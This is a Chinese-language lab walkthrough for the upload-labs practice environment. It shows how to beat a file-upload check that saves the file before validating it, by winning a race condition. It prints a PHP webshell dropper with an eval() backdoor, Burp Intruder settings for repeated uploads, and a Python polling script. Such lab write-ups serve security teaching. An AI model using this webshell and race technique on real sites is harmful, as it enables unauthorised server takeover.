$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
原理
从源码来看,服务器先是将上传的文件保存下来,然后将文件的后缀名同白名单对比,如果是jpg、png、gif中的一种,就将文件进行重命名。如果不符合的话,unlink()函数就会删除该文件。
这么看来如果我们还是上传一个图片马的话,网站依旧存在文件包含漏洞我们还是可以进行利用。但是如果没有文件包含漏洞的话,我们就只能上传一个php木马来解析运行了。
那还怎么搞?上传上去就被删除了,我还怎么去访问啊。
不慌不慌,要知道代码执行的过程是需要耗费时间的。如果我们能在上传的一句话被删除之前访问不就成了。这个也就叫做条件竞争上传绕过。
我们可以利用burp多线程发包,然后不断在浏览器访问我们的webshell,会有一瞬间的访问成功。
为了更好的演示效果,一句话木马webshell.php内容为:
<?php fputs(fopen('p17.php','w'),'<?php @eval($_POST["p17"])?>');?>
这行代码的意思是 只要用户访问这个webshell.php文件,就会在当前目录新建一个名为p17.php 里面包含一句话密码为p17
把这个php文件通过burp一直不停的重放,然后再写python脚本去不停的访问我们上传的这个文件,总会有那么一瞬间是还没来得及删除就可以被访问到的,一旦访问到该文件就会在当前目录下生成一个p17.php的文件的话。我们再去访问p17.php文件,而且这个办法生成的p17.php服务器是不会删除的,我们就可以通过蚁剑去链接了。
编写木马
、
上传webshell.php ,并且转到 intruder
进行下一步操作前,这里有个小细节,就是不要把BP的拦截功能关闭了,要一直保持拦截状态以达到测试更好的效果
然后选择Clear$
接着设置无限发送空的Payloads,来让它一直上传该文件
最后建议这里把线程设置高一点
这一步后先不要执行
因为我们写一个自动访问的py
3.自动化读取上传的木马php
写一个python文件,省去手动刷新浏览器 我这里取名为p17.py ,切记代码里面的url不要弄错了,根据自己的路径填写
import requests
url = "http://192.168.31.33/upload-labs-master/upload/webshell.php"
while True:
html = requests.get(url)
if html.status_code == 200:
print("OK")
break
接下里就是重头戏了 为了方便演示我先清空目录里的文件
启动brup
可以看到 目录里面的文件 一会存在 一会消失
这时执行py
执行成功 多了一个p17.php 我们就可以使用蚁剑访问了
http://192.168.31.33/upload-labs-master/upload/p17.php
ps 如果py跑起来 发现没有生成p17.php 请停止brup的playload 重新start attack 再重新执行py代码
就是多试几次
